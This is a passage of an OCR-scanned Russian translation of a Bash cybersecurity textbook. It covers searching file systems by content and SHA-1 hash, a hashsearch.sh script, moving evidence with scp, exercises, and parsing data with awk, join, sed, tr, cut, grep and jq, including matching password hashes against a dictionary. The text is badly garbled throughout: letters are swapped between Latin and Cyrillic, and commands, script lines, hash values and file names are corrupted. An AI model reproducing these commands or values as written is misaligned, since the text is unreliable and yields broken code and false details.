© Другие параметры устанавливают переменные, чтобы мы могли их задейство- 
вать. В этом случае мы отменяем (О№ЅЕТ) ранее установленную переменную. Когда 
эта переменная будет указана позже как $ ОЕЕР ОВМОТ, она не будет иметь значения, 
поэтому фактически исчезнет из командной строки, в которой используется. 


© Это еще один шаблон подстановки, *, соответствующий чему угодно. Если 
ни один другой шаблон не будет найден, выполнится данное условие. По сути, это 
условие е1ѕе для оператора саѕе. 


Ө Закончив анализ параметров, мы можем избавиться от аргументов, обрабо- 
танных с помощью $11+*. Только следует учесть, что разовое выполнение $114 
избавляет лишь от одного аргумента. В этом случае аргумент, расположенный 
вторым, становится первым, третий становится вторым и т. д. Указание количества 
повторений команды ѕһіЄ+, например $11445, позволит избавиться от первых пяти 
аргументов и в результате аргумент $6 станет $1, $7 станет $2 и т. д. При вызове 
рефор+$ отслеживается, какие аргументы требуется обработать в переменной обо- 
лочки ОРТІМ№. Выполнив нужное количество повторений команды ѕһіғ+, мы избав- 
ляемся от любых/всех проанализированных параметров. После такого сдвига $1 
будет ссылаться на первый аргумент, независимо от того, были ли предоставлены 
какие-либо параметры, когда пользователь вызывал сценарий. 


Ө Два возможных аргумента не в формате -орќіоп — это шаблон, который мы 
ищем, и каталог, в котором хотим начать поиск. Когда мы ссылаемся на переменную 
Баѕћ, можем добавить :- и сказать: «Если это пустое значение не задано, вернуть 
вместо него значение по умолчанию». По умолчанию для РАТТЕВМ мы присваиваем 
значение в виде документа РОЕ, а значением по умолчанию для 5ТАКТРІК является ., 
что означает ссылку на текущий каталог. 


© Далее вызывается команда +1п9, которая должна начать поиск в $5$ТАВТОТК. 
Помните, что $ОЕЕРОВМОТ может не устанавливаться и, следовательно, ничего 
не добавлять в командную строку. Кроме того, здесь может находиться значение 
по умолчанию -тахаер*Н 1, указывающее, что Ғіпа не следует искать глубже этого 
каталога. Чтобы находить только простые файлы (не каталоги или специальные 
файлы устройств либо ЕТЕО), мы добавили параметр -+уре +. Этот параметр 
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не является обязательным, и вы можете удалить его, если хотите иметь возмож- 
ность искать файлы конкретного типа. Имена найденных файлов передаются 
в цикл мһі1е, который будет читать их по одному в переменной ЕМ. 


© Параметр -4 команды евгер говорит о том, что эта команда работает незаметно 
и ничего не выводит. Нам не обязательно видеть, какая именно фраза найдена 
в данный момент, только ради того, чтобы знать, что она найдена. 


Ф Конструкция $? — это значение, возвращаемое предыдущей командой. Успеш- 
ный результат означает, что евгер обнаружила предоставленный шаблон. 


Ф Здесь проверяется, имеет ли СОРУ значение. При отсутствии значения результа- 
том 1+ будет Ға1ѕе. 


Ф Параметр -р команды ср при копировании позволяет сохранить всю информацию 
о копируемом файле: имя владельца и временные метки файла. Эта информация 
может быть важной для вашего анализа. 


Если вы ищете более легкое решение, но с меньшими возможностями, можете 
выполнить аналогичный поиск с помощью параметра ехес команды +1п4, как по- 
казано далее: 


Ғіпа / -+уре + -ехес +#11е '{}' \; | ергер 'РМб' | сиё -а' ' -+1 


Здесь мы отправляем каждый элемент, найденный командой +#іпа, в команду #11е, 
которая определит тип найденного файла. Далее вывод файла передается команде 
евгер, где происходит его фильтрация, в результате чего выполняется поиск клю- 
чевого слова Р№. Команда си* используется, чтобы очистить вывод и сделать его 
более удобным для чтения. 


Будьте осторожны при использовании команды Я в ненадежной системе. Коман- 
да использует файл магического шаблона, расположенный в /иѕг/ѕћаге/тіѕс/. Зло- 
умышленник может изменить этот файл таким образом, что определенные типы 
файлов не будут идентифицированы. Лучше всего подключить подозрительный 
диск к компьютеру с надежной системой и провести поиск оттуда. 


Поиск по хеш-значению 


Криптографическая хеш-функция — это необратимая функция, которая преобра- 
зует входное сообщение произвольной длины в список сообщений фиксированной 
длины. К общим алгоритмам хеширования относятся МО5, $НА-1 и ЅНА-256. 
Рассмотрим два файла (примеры 5.5 и 5.6). 
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Пример 5.5. һаѕһеа.іхі 
Тһіѕ 15 һаѕһ +11е А 


Пример 5.6. һаѕһ Мер. 6 
Тһіѕ 15 һаѕһ +11е В 


Обратите внимание, что файлы идентичны, за исключением последней буквы 
в предложении. Вы можете использовать команду ѕһа15ит для вычисления дай- 
джеста сообщений ЅНА-1 для каждого файла: 


$ ѕһа1ѕит ПазИ11еа.&хЕ һаѕһҒі1еЬ.Ехі 


ба07+е595+9656717е474а+976360а6231е766е8 *ПазН+11еа. хе 
2959е3362166с896384900661+52652263317826 *һаѕһҒі1ер. . Ех 


Несмотря на то что между этими двумя файлами есть небольшая разница, они 
генерируют совершенно разные хеши (дайджесты) сообщений. Если бы фай- 
лы были одинаковы, то и дайджесты сообщений оказались бы одинаковыми. 
Вы можете использовать это свойство хеширования для поиска определенного 
файла в системе, если знаете его дайджест. Преимущество в том, что на поиск 
не будут влиять имя файла, местоположение или любые другие атрибуты; недо- 
статок в том, что файлы должны быть абсолютно одинаковы. Если содержимое 
файла каким-либо образом было изменено, поиск не даст результатов. Сценарий 
һаѕһѕеагсһ. ѕһ, показанный в примере 5.7, рекурсивно просматривает систему, на- 
чиная с местоположения, заданного пользователем. Этот сценарий вычисляет хеш 
ЅНА-1 для каждого найденного файла, а затем сравнивает вычисленное значение 
со значением, предоставленным пользователем. Если они совпадают, сценарий 
выводит путь к файлу. 


Пример 5.7. һаѕһѕеагсһ.5һ 


#!/61п/Ба$й - 

# 

ВазИ и кибербезопасность 
һаѕһѕеагсһ. $И 


Описание: 
В указанном каталоге выполняем рекурсивный поиск 
файла по заданному $НА-1 


Использование: 
һаѕһѕеагсһ.ѕһ <һаѕһ»> <дӢігесёогу>» 
һаѕһ - Значение хеша ЅНА-1 разыскиваемого файла 
91гесфогу - Каталог для поиска 


жен 
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НАЗН=$1 
ОТВ=${2:-.} # сма, по умолчанию это здесь 


# конвертируем путь в абсолютный 


Ғипсёіоп ткабѕра+һ () [6] 
{ 
М [[ $1 == /* 1] 9 
{Неп 
АВ$=$1 
е1ѕе 
АВ$="$РИО/$1" [8] 
Та 
} 
Ғіпа ФОТВ -+уре + | © 
мһі1е геаа #п 
ао 
ТНІЅОМЕ=$ (зНа1зит "$+4п") [2] 
ТНІЅОМЕ=${ ТНІЅОМЕ%% *} © 
1% [[ ФТНІЅОМЕ == ФНАЅН ]] 
{Неп 
ткабзрафн "Фп" [4] 
есһо $АВЅ [5] 
Т1 
аопе 


© Для нашего хеша мы будем искать любой простой файл. Нам следует избегать 
специальных файлов; чтение ЕТЕО приведет к зависанию программы, так как она 
станет ожидать, когда кто-нибудь что-то запишет в ЕТЕО. Чтение блочного или 
специального символьного файла — тоже не очень хорошая идея. Параметр -+уре + 
гарантирует, что мы получим только простые файлы. Сценарий выводит имена 
этих файлов, по одному в строке, в стандартный вывод, который мы перенаправ- 
ляем через канал передачи данных в команды мһі1е геаа. 


@ Здесь вычисляется значение хеша в подоболочке, захватывается его вывод 
(то есть все, что записывается в стандартный вывод), после чего эти данные при- 
сваиваются переменной. Кавычки нужны, если в имени файла есть пробелы. 


Ө Это переназначение удаляет с правой стороны самую большую подстроку, на- 
чинающуюся с пробела. Вывод ѕһа1ѕип — это и вычисленный хеш, и имя файла. 
Нам же нужно только хеш-значение, поэтому с помощью этой замены мы удаляем 
имя файла. 


Ө Далее вызывается функция ткабѕра+ћ, а имя файла помещается в кавычки. 
Кавычки гарантируют, что все имя файла отображается как один аргумент функ- 
ции, даже если в имени содержится один или несколько пробелов. 
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Ө Помните, что те переменные оболочки внутри функции, которые не объявлены 
локальными, являются глобальными. Поэтому значение дАв$, которое было задано 
при вызове ткабѕра+ћ, нам здесь доступно. 


© Это наше объявление функции. При объявлении вы можете опустить или клю- 
чевое слово Ғипс+іоп, или скобки. 


Ө Для сравнения мы используем сопоставление с образцом оболочки, который рас- 
положен справа. В этом случае будет выполнена проверка, начинается ли первый 
параметр со слеша. Если это так, это уже абсолютный путь и нам больше ничего 
не нужно делать. 


© Когда параметр представляет собой только относительный путь, он относится 
к текущему местоположению, поэтому мы добавляем текущий рабочий ката- 
лог, в результате чего этот путь становится абсолютным. Переменная РМО — это 
переменная оболочки, которая устанавливается в текущий каталог с помощью 
команды са. 


Передача данных 


После того как вы собрали все необходимые данные, для дальнейшего анализа их 
необходимо переместить из исходной системы. Для этого вы можете скопировать 
данные на съемное устройство или загрузить их на централизованный сервер. 
Если вы собираетесь загружать данные, убедитесь, что применяете безопасный 
метод, например Ѕесиге Сору (5СР). В следующем примере ѕср используется для 
загрузки файла ѕоте_ѕуѕёет. аг. рг в домашний каталог пользователя боб, который 
находится в удаленной системе 10.0.0. 45: 


ѕср ѕоте _ѕуѕ+ет. аг. е2 боб@10.0.0.45: /Һоте/боб/ѕоте ѕуѕ+ет. аг. е2 


Для удобства в конце коллекции ваших сценариев вы можете добавить эту стро- 
ку, чтобы автоматически использовать ѕср для загрузки данных на указанный 
хост. Не забудьте дать своим файлам уникальные имена, чтобы не перезаписы- 
вать существующие файлы, а также чтобы впоследствии было легче выполнять 
анализ. 


Будьте осторожны при выполнении в сценариях аутентификации $5Н или $СР. 
Не рекомендуется указывать в сценариях пароли. Лучше всего использовать 
сертификаты 55Н. Ключи и сертификаты можно создать с помощью команды 
ѕ5һ-кеудеп. 
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Выводы 


Сбор данных — важный шаг при обеспечении безопасности. При сборе данных обя- 
зательно передавайте и храните их, используя безопасные (то есть зашифрованные) 
методы. Собирайте все данные, которые считаете актуальными. В дальнейшем вы 
сможете их легко удалить, но не сможете анализировать данные, которые не со- 
брали. Прежде чем собирать данные, убедитесь, что у вас есть разрешение и/или 
законные права на это. 


Имейте также в виду, что злоумышленники часто пытаются скрыть свое присут- 
ствие, удаляя или запутывая данные. Чтобы противостоять этому, обязательно 
используйте несколько методов, когда поиск файлов будет осуществляться по 
имени, хешу, содержимому ит. д. 


В следующей главе мы рассмотрим методы обработки и подготовки данных 
к анализу. 


Упражнения 


1. Напишите команду для поиска в файловой системе любого файла с именем 
дов. рпе. 

2. Напишите команду для поиска в файловой системе любого файла, содержащего 
слово «конфиденциальный». 


3. Напишите команду для поиска в файловой системе любого файла, содержащего 
слова «секретный» или «конфиденциальный», и скопируйте этот файл в текущий 
рабочий каталог. 


4. Напишите команду для выполнения в удаленной системе 192.168.10.32 коман- 
ды 15 -К / и запишите полученный результат в файл #і1е115+.+хі, который 
находится в вашей локальной системе. 


5. Измените с помощью ЅСР сценарий реё1оса1.ѕћ для автоматической загрузки 
результатов на указанный сервер. 


6. Измените сценарий һаѕһѕеагсһ.ѕһ так, чтобы получить возможность (-1) вы- 
хода после поиска совпадения. Если параметр не указан, будет продолжен поиск 
дополнительных совпадений. 


7. Измените сценарий һаѕһѕеагсһ.ѕһ таким образом, чтобы упростить полный 
путь, который он выводит: 


® если строка, которую он выводит, представлена в виде /поте/и$г07/$чЬ- 
аїг/. /тіѕс/х.ааќа, измените ее, чтобы удалить лишние символы ./ перед 
печатью; 
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® если строка представлена в виде /поте/изг/07/зиба1г/. . /т15с/х.аажа, 
измените ее так, чтобы удалить перед печатью ../ и зи691г/. 


8. Измените файл м1п1085.5И так, чтобы показать ход его выполнения, выводя 
имя файла журнала поверх предыдущего имени файла журнала. (Подсказка: 
используйте символ возврата, а не перевод строки). 


9. Измените файл міп108ѕ.5ћ так, чтобы отображался простой индикатор выпол- 
нения со знаками плюс, печатаемыми слева направо. Используйте отдельный 
вызов меуіи+і1 е1, чтобы получить счетчик количества журналов и увеличить 
его, скажем, до 60. 


10. Измените файл міп1овѕ. ѕһ так, чтобы привести в порядок данные, которые он 
выводит, то есть удалить извлеченные файлы журнала (файлы .еуїх) после 
того, как они будут скопированы. Это можно сделать двумя разными способами. 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт ВЁрз://\м\м/.гарсуБегор$.сот/. 


Обработка данных 


В предыдущей главе вы собрали много данных. Они представлены в различных 
форматах, включая такие, как текст в свободной форме, значения с разделителями- 
запятыми (СЗУ) и ХМГ. В этой главе мы покажем вам, как разбирать и обрабаты- 
вать эти данные, чтобы извлекать ключевые элементы для анализа. 


Используемые команды 


Для подготовки собранных данных к анализу мы используем команды амк, јоіп, 
ѕеа, а11 и ёг. 


амк 


Команда амк — это не просто команда, а фактически язык программирования, пред- 
назначенный для обработки текста. Целые книги посвящены этой теме. Более по- 
дробное описание команды амк вы еще найдете в книге. Здесь мы приведем краткий 
пример ее использования. 


Общие параметры команды 
-Е — читать указанный файл в программе амк. 
Пример команды 


Посмотреть файл амкиѕегѕ . х, показанный в примере 6.1. 


Пример 6.1. амкиѕегѕ.іхї 


Міке Јопеѕ 
Зопп Ѕті+һ 
Каһу Јопеѕ 
Јапе Кеппеау 
Тіт ЅсоЄ 
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Вы можете использовать команду амк для печати тех строк, в которых есть фамилия 
пользователя — Јопеѕ: 


$ амк '$2 == "Јопеѕ" {рг1пЕ $0}' амКизег$. хе 


Міке Јопеѕ 
Кафпу Јопеѕ 


амк выполнит итерацию для каждой строки входного файла, прочитав каждое 
слово. Слова в строке (по умолчанию) разделены пробелами на поля. Поле $9 сим- 
волизирует всю строку, $1 — первое слово, $2 — второе слово и т. д. Программа амк 
состоит из шаблонов и соответствующего кода, который при совпадении шаблона 
должен быть выполнен. В данном примере есть только один шаблон. Мы проверяем 
лишь поле $2, чтобы посмотреть, содержит ли оно значение Јопеѕ. Если совпадение 
обнаружится, амК запустит код, указанный в скобках, который в данном случае 
выведет всю строку. 


Если мы не будем делать явное сравнение и вместо этого напишем неуклюжее 
'/ Јопеѕ/ {рип $0}', строка между слешами станет регулярным выражением, которое 
будет сопоставляться слюбым другим регулярным выражением в строке ввода. Коман- 
да, как и прежде, будет выводить все имена, но также найдет строки, где Јопеѕ может 
быть полным именем или частью более длинного имени (например, "Јопеѕёоут"). 


оп 
Команда јоіп объединяет строки из двух файлов с общими полями. Чтобы файлы 
были правильно объединены, их нужно корректно отсортировать. 


Общие параметры команды 


О -ј — использовать указанный номер поля. Поля начинаются с 1. 


О -+ — символ, который будет использоваться в качестве разделителя полей. 
По умолчанию разделителем является пробел. --һеайег — использовать в ка- 
честве заголовка первой строки каждого файла. 


Пример команды 
Рассмотрим файлы, приведенные в примерах 6.2 и 6.3. 


Пример 6.2. изегпате. 


1,јаое 
2,риѕег 
3, јѕтіёһ 
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Пример 6.3. ассез$Ите ж 


0745,+11е1.%хе,1 
0830, і1е4.хі, 2 
0830, Ғі1е5.їхі,3 


Оба файла имеют общее поле данных, хранящее идентификаторы пользователей. 
В файле ассеѕѕіте.хё идентификатор пользователя находится в третьем столбце. 
В файле иѕегпатеѕ. хе идентификатор пользователя находится в первом столбце. 
Вы можете объединить эти два файла следующим образом: 


$ јоіп -1 3 -2 1 -&, ассеѕѕііте. хі изегпате. хе 


1,0745, Ғ11е1.+х+, јаое 
2,0830 ,+11е4. Ех, ризег 
3,0830, Ғ11е5.+х+, ] зт1 И 


Параметр -1 3 указывает јоіп использовать третий столбец в первом файле 
(ассеѕѕ+іте .х+), а -2 1 указывает взять при объединении файлов первый столбец 
во втором файле (иѕегпатеѕ.ёхё). Параметр -*, говорит о том, что в качестве раз- 
делителя полей используется запятая. 


ѕеа 


Команда ѕеа позволяет выполнять редактирование, например заменять символы 
в потоке данных. 


Общие параметры команды 
-1 — редактировать указанный файл и перезаписать на месте. 
Пример команды 


Команда ѕеа многофункциональная и может быть использована для выполнения 
различных действий. Одна из наиболее распространенных функций — замена 
символов или последовательностей символов. 


Посмотрите файл ірѕ.+х+, показанный в примере 6.4. 


Пример 6.4. ірѕ.іхї 


1р,05 
10.0.4.2,Міпӣомѕ 8 
10.0.4.35,0бипти 16 
10.0.4.107 , тас0$ 
10.0.4.145 ‚тас0$ 


Вы можете использовать команду зеа для замены всех [Р-адресов 10.0.4.35 на 
10.0.4.27: 
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$ зе '5/10\.0\.4\.35/10.0.4.27/6' 1рѕ.іхі 


1р,05 
10.0.4.2,Міпӣомѕ 8 
10.0.4. 27,0бипти 16 
10.0.4.107 , тас0$ 
10.0.4.145 , тас0$ 


В этом примере команда ѕеа использует формат, где каждый компонент разделен 
слешем: 


ѕ5/<гери1аг ехргеѕѕіоп>/<гер1асе м1{И>/<Е1ав$> 


Первая часть приведенной команды указывает ѕеа выполнить замену. Вторая часть 
команды (10\.0\.4\.35) представляет собой шаблон регулярного выражения. Третья 
часть (10.0.4.27) — это значение, которое следует использовать для замены в случае 
соответствия шаблону. Четвертая часть — необязательные флаги, которые в данном 
случае (е для глобальной замены) указывают ѕеа заменить все экземпляры в строке 
(а не только первые), соответствующие шаблону регулярного выражения. 


фай 


Команда %а11 используется для вывода последних строк файла. По умолчанию 
в конце будут выведены последние десять строк файла. 


Общие параметры команды 


О -+ — выполнять постоянный мониторинг файлов и выходных строк по мере их 
добавления. 


О -п — вывести указанное количество строк. 

Пример команды 

Для вывода последней строки в файле зоме+11е. хе напишите следующее: 
$ {а11 -п 1 ѕоте+і1е. хі 


12/30/2017 192.168.10.185 1оріп.һіёт1 


г 


Команда +г используется для преобразования (замены) одного символа в другой 
или отображения замещающего символа. Эта команда также часто применяется 
для удаления нежелательных или посторонних символов. Ввод команды «г осу- 
ществляется или из стандартного ввода, или из вывода других программ путем 
перенаправления. 
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Общие параметры команды 


оО -9— удалить указанные знаки из входного потока. 


О -5ѕ — уплотнить, то есть заменить повторяющиеся экземпляры символа одним 


экземпляром. 


Пример команды 


С помощью команды г можно заменить все обратные слеши прямыми, а все двое- 
точия — вертикальными линиями: 


в "\\" "/|' < іпҒі1е.іхі > очцЕЕ11е. хе 


Предположим, содержимое іпҒіпе .ёхі выглядит следующим образом: 


агіуе: раёћ\пате 
с: \Узег$\Эефаи1*\+11е. хе 


После выполнения команды г" файл оцЕ+11е. хі будет выглядеть так: 


агіме |раћ/пате 
с | /Оѕееѕ /ОеҒаи1+/Ғі1е.хЁ 


Символы из первого аргумента сопоставляются с соответствующими символами 
второго аргумента. Два обратных слеша используются для обозначения символа 
одного обратного слеша, так как введенный в строку одиночный обратный слеш 
имеет особое значение для ёг и используется для обозначения таких специальных 
символов, как символ разрыва строки (\п), возврата каретки (\г) или табуляции 
(\є). Чтобы избежать какой-либо специальной интерпретации в Баѕћ, приводите 
эти аргументы в одиночных кавычках. 


Файлы, получаемые из операционной системы \Міпаомѕ, часто имеют в конце 
каждой строки символы возврата каретки (сагйаде геѓигп) и перевода строки (йпе 
ееа) (СК & ЕР). В системах Мпих и тасО$ для завершения строки предусмотрен 
только символ разрыва строки (пем/те). Если вы переносите файл в пих и хотите 
избавиться от дополнительных возвращаемых символов, выполните команду їг, 
как показано ниже: 


{г -9 '\г' < Е11ей1та. хе > +і1еҒіхеа. хі 


И наоборот, с помощью команды ѕеа вы можете преобразовать конец строки 
файлов из операционной системы пих в конец строки для операционной си- 
стемы \\Ипом: 


$ ѕеа -1 '$/$/\г/' Ғі1еііпих.Ехі 


Параметр -і вносит изменения на месте и записывает их обратно во входной файл. 


Глава 6. Обработка данных 101 


Обработка файлов с разделителями 


Многие файлы, которые вы будете обрабатывать, скорее всего, содержат текст. 
Поэтому важно уметь обрабатывать текст из командной строки. Текстовые файлы 
разбиваются на поля с помощью таких разделителей, как пробел, символ табуля- 
ции или запятая. Один из наиболее распространенных форматов называется СЗУ 
и обозначает данные, разделенные запятыми (сотта-зерагабе4 уа[иез). Поля могут 
быть указаны в двойных кавычках ("). Первая строка СЅУ-файла часто является 
заголовком поля. Пример 6.5 показывает образец СЗУ-файла. 


Пример 6.5. сѕуех.іхї 


"пате" , "изегпате" , "рһопе" , "раззмога һаѕһ" 

"Јоһп ЅміЄп", "јѕтіЄһ", "555 -555-1212" , 5+449сс365аа765961983274е6882с+99 
"Запе ЅміЄһ", "ЈпѕтіЄһ", "555-555 -1234" ‚е19а4с39496а59аббе56е057+20+883е 
"Ві11 Јопеѕ", "рјопеѕ", "555-555-6789" , 48578е918458се066с56676а58с5са4 


Чтобы извлечь из файла только имя, следует использовать команду сиё, указав 
в качестве разделителя полей запятую и номер возвращаемого поля: 


$ сиё -а',' -+1 сзуех. хе 


"пате" 

"Јоһп Ѕмі+һ" 
"Эапе Ѕмі+һ" 
"Ві11 Јопеѕ" 


Обратите внимание, что значения полей по-прежнему заключены в двойные кавыч- 
ки. Для некоторых приложений это может стать помехой. Чтобы удалить кавычки, 
следует передать вывод в команду г с помощью опции -а: 


$ си -а',' -Е1 сзуех. хе | 4г -а '"' 


пате 
Јоһп ЅтіЁһ 
Јапе ЅтіЁһ 
Ві11 Јопеѕ 


Дальнейшую обработку данных можно выполнить, удалив заголовок поля с по- 
мощью опции -п команды Ёаі1: 


$ си -4',' -+1 сѕуех.іхі | г -а '"' | +аі1 -п +2 
Зойп ЅтіТһ 


Јапе ЅтіЁһ 
Ві11 Јопеѕ 
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Опция -п +2 указывает команде +а11 выводить содержимое файла, начиная со 
строки 2, удаляя таким образом заголовок поля. 


Вы также можете предоставить команде сиё список полей, которые необходимо 
извлечь. Например, -Ё1-3 извлечет поля с 1 по 3, а -11, 4 — поля 1 и 4. 


Итерация данных с разделителями 


Хотя для извлечения целых столбцов данных можно использовать команду си*, 
иногда при обработке файла требуется извлекать поля построчно. В этом случае 
вам лучше всего воспользоваться командой амк. 


Предположим, вы хотите проверить хеш пароля каждого пользователя, который 
хранится в файле сѕуех.ёхі, на соответствие файлу со словарем известных паролей 
раззмог4$ .хі (примеры 6.6 и 6.7). 


Пример 6.6. сзуех. 


"паме" , "изегпате" , "рһопе" , "раѕѕмога һаѕһ" 

"Јоһп ЅміЄһ", "УѕтіЄһ", "555 -555-1212" ,5+449сс365аа765461983274е6882с+99 

"Јапе ЅміЄһ", "УпѕміЄһ", "555-555-1234" ‚е19аас39496а59аббе56е957+20+883е 
"Ві11 Јопеѕ", "Юрјопеѕ", "555 -555-6789" , 18578еағ8458седбғьс56Ь76ба58с5са4 


Пример 6.7. раѕѕухогаѕ.іхї 


раѕѕмога, таѕһаѕһ 

123456 , е19а4с39496а59абБе56е057+201883е 
раѕѕмога, 5+44сс365аа7659614983274е6882с+99 
ме1соте , 496е4е5969а2а2659+1+6918с9е8663а7 
піпја, 3899асбаБ79+92а+727с21906648абс5 
абс123 , е99а18с428с63845+260853678922е03 
123456789, 25+9е7943236453885+5181+16624а06 
12345678 ,25455а9283аа400а+464с764713с097аа 
зипзН1 пе, 0571749е2ас330а7455809с669е7а+99 
ргіпсеѕѕ ,ЗаҒа847#50а716е649324995с8е7435а 
дмег+у , 48578еағ8458седбғьс56ЫЬ76ба58с5с 


Вы можете извлечь хеш пароля каждого пользователя из файла сѕуех.іхі, следу- 
ющим образом используя команду амк: 


$ амк -Е "," '{ргіпі $4}' сѕуех. хі 


"раѕѕмоға һаѕһ" 

5+44сс365аа765961983274е6882с+99 
е190а9с3949Ба59аббе56е057+20+883е 
98578е4+8458се066с56676а58с5са4 
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По умолчанию в качестве разделителя полей команда амк использует пробел, 
поэтому параметр -Е применяется для идентификации пользовательского раз- 
делителя полей (,) и последующей печати четвертого поля ($4), которое пред- 
ставляет собой хеш пароля. Затем вы можете использовать команду вгер, которая 
укажет команде амк выводить любые совпадения, найденные в файле раѕѕмогаѕ .хї, 
по одной строке: 


$ егер "$(амк -Е "," '{рг1пе $4}' сзуех.Ехе)" раз$мога$. хе 


123456 , е109а4с3949Ба59аббе56е057+20+883е 
раѕѕмога, 5+44сс365аа7654961483274е6882с+99 
дмег\у , 48578еа+8458сед66с56676а58с5са4 


Обработка по позиции символа 


Если файл имеет поля фиксированной ширины, то для извлечения данных по по- 
зиции символа можно использовать параметр -с команды си*. В файле сз\уех.&х& 
номер телефона — это пример поля фиксированной ширины. Рассмотрим следу- 
ющий пример: 


$ си -4',' -+3 сѕуех.іхё | си -с2-13 | +аі1 -п +2 


555-555-1212 
555-555-1234 
555-555-6789 


Для извлечения телефонного номера из поля З сначала используется команда сиё 
(с указанием разделителя). Поскольку каждый номер телефона имеет одинаковое 
количество символов, то для извлечения символов, находящихся между кавычка- 
ми, вы можете использовать команду сиќ с параметром -с. После чего для удаления 
заголовка файла следует ввести команду *а11. 


Обработка ХМ 


Расширяемый язык разметки (ХМТ.) позволяет произвольно создавать теги 
и элементы, описывающие данные. В примере 6.8 представлен пример ХМТ- 
документа. 


Пример 6.8. боок.іхї 


<Боок ёі1е="Сурегѕесигіёу 0рѕ и1ЕН Баѕһ" едііоп="1"› Ө 
<аиһог»> Ө 
<ЕігѕЕМате>Раи1</ҒігѕЕМате> Ө 
<1аѕіМате>Тропсопе< /1аѕЕМате> 
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</аиёћог> Ө 
<аиһог> 
<#1ігѕЕМате>Саг1</ҒігѕМате> 
<1а5{Мате>А161п8</1а${Мате> 
</аиёһог> 
</Боок> 


© Это открывающий тег, содержащий два атрибута, также известные как пара 
«имя/значение». Значения атрибутов всегда должны заключаться в кавычки. 


Ө Открывающий тег. 
© Это элемент с содержимым. 
Ө Закрывающий тег. 


Для успешной обработки вы должны иметь возможность поиска в ХМІ. и извле- 
чения данных из тегов. Это действие можно выполнить с помощью команды вгер. 
Найдем все элементы +1г$+Мате. Чтобы вернуть текст, соответствующий шаблону 
регулярного выражения, а не всей строке, следует использовать опцию -0: 


$ ргер -о '<+1г$Мате>.*<\/Е1г5ЕМате>' Боок.хм1 


<#ігѕ+Мате>Раи1</Ғігѕ+Мате> 
<ҒігѕЕМате>Саг1</Ғігѕ+Мате> 


Обратите внимание: если открывающий и закрывающий теги находятся в одной 
строке, указанное регулярное выражение находит только элемент ХМІ. Чтобы 
найти заданный образец в нескольких строках, вам нужно использовать две спе- 
циальные функции. Во-первых, добавьте к команде вгер параметр -7, который 
позволит в процессе поиска обработать новые строки как любой обычный символ 
и добавить нулевое значение (АЗСП 0) в конце каждой найденной строки. Затем 
к шаблону регулярных выражений, который является модификатором сопостав- 
ления с образцом для Рег|, добавьте опцию -Ри (?5$). С помощью этого шаблона 
будет выполнена замена метасимвола . соответствующим символом новой строки. 
Вот пример с этими двумя функциями: 


$ егер -Ргхо '(?$)‹аиВог>.*?<\/аиЕНог>' боок.хт1 


<аиёһог> 
<Ғігѕ+Мате>Раи1</Ғігѕ+Мате> 
<1аѕ+Маме»>Тгопсопе</1аѕЕМате> 
</аиёћог><аиЁһог> 
<ҒігѕЕМате>Саг1</Ғігѕ+Мате> 
<1а${Мате>А161п85< /1а${Мате> 
</ачЕВог> 
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Опция -Р доступна не во всех версиях команды дгер, в частности недоступна 
в тасО5. 


Чтобы удалить открывающие и закрывающие теги ХМТ, и извлечь содержимое, 
можно направить вывод в команду ѕеаӣ: 


$ вгер -Ро '<ҒігѕМате>. *?<\/ҒїгѕМате>' Боок.хш1 | ѕеа '$/<[^>]*>//в' 


Раи1 
Саг1 


Выражение ѕеа можно описать как ѕ/ехрг/оёћег/. Оно указывает заменить (или 
выполнить подстановку) выражение (ехрг) чем-то другим (оёһее). Выражение 
может быть задано буквенными символами или более сложным регулярным вы- 
ражением. Если выражение не имеет другой части, такой как ѕ/ехрг//, то оно за- 
меняет все, что соответствует регулярному выражению, пустыми символами, по 
существу удаляя его. Шаблон регулярного выражения, которое мы используем 
в предыдущем примере, а именно выражение < [^>] *>, немного сбивает с толку, 
поэтому разберем его. 


О <-— шаблон начинается с литерала ‹. 


О [^>]* — символом * обозначает ноль или более символов из набора символов 
внутри скобок. Первый символ — ^, что означает: нет любого из оставшихся 
символов в списке. Далее следует одиночный символ >, поэтому [^ >] соответ- 
ствует любому символу, который не равен >. 


Я >= шаблон заканчивается литералом >. 


Шаблон будет соответствовать одиночному ХМІ -тегу, который открывается сим- 
волом < и закрывается символом >, но не более того. 


Обработка ЈЅ50М№ 


ЈахаЅсгірё ОБјесі М№Мосайоп (]ЗОМ) — это еще один популярный формат файлов, 
используемый, в частности, для обмена данными через программные интерфейсы 
приложения (АРІ). ]$ОМ-файл состоит из объектов, массивов и пар «имя/значе- 
ние». В примере 6.9 приведен образец ]$ЗОМ-файла. 


Пример 6.9. боок.јѕоп 


{© 
"ЕіЄ1е": "Сурегѕесигіёу Орз мі&һ Баѕһ", Ө 
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"еаіёіоп": 1, 
"аиїћогѕ=": [ Ө 


{ 
"Ғігѕ+Мате" : "Рац1", 
"1аѕ&Мате": "Тгопсопе" 
$, 
{ 
"#ігѕ+Мате" : "Саг1", 
"1аѕ&Мате": "А1біпр" 
} 


] 
} 


© Это объект. Объекты начинаются с символа { и заканчиваются символом }. 


@ Пара «имя/значение». Значениями могут быть строка, число, массив, логическое 
значение или пи11. 


Ө Это массив. Массивы начинаются с символа [ и заканчиваются символом ]. 


Для получения дополнительной информации о формате Ј50М посетите веб- 
страницу ћр://јѕоп.ого/. 


При обработке ]ЗОМ, вероятно, потребуется извлечь пары «ключ/значение», что 
можно сделать с помощью команды вгер. Для извлечения пары «ключ/значение» 
ҒігѕМ№ате из боок. јѕоп выполните следующую команду: 


$ эгер -о '"ҒігѕЕМате": ".*"' роок.)5о0п 
"Е1г5{Мате": "Раџ1" 
"Е1г5{Мате": "Саг1" 


Параметр -о используется для возврата только тех символов, которые соответству- 
ют шаблону, а не всей строке файла. 


Если вы хотите удалить ключ и вывести только значение, можете передать вы- 
вод команде си+, а затем с помощью команды г извлечь второе поле и удалить 
кавычки: 


$ вгер -о '"Ғігѕ+Мате": ".*"' боок.јѕоп | си -а " " -+2 | 4г -а '\"' 


Раи1 
Саг1 


Мы выполним более сложную обработку ЈЅОМ в главе 11. 
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ЈО 


ја — это мощный легкий язык и ]ЗОМ-анализатор, предназначенный для командной 
строки іпих. Но по умолчанию он в большинстве версий Гл4пих не установлен. 


Чтобы с помощью ја получить ключ заголовка боок. јѕоп, выполните следующее: 
$ ја '.+ії1е' Боок. оп 
"СуБегзесиг1у 0рѕ м1ЕН баѕћ" 

Для перечисления имен всех авторов введите такую команду: 

$ ја '.аиһогѕ[].ҒігѕЕМате' Боок.-зоп 


"Раи1" 
"Саг1" 


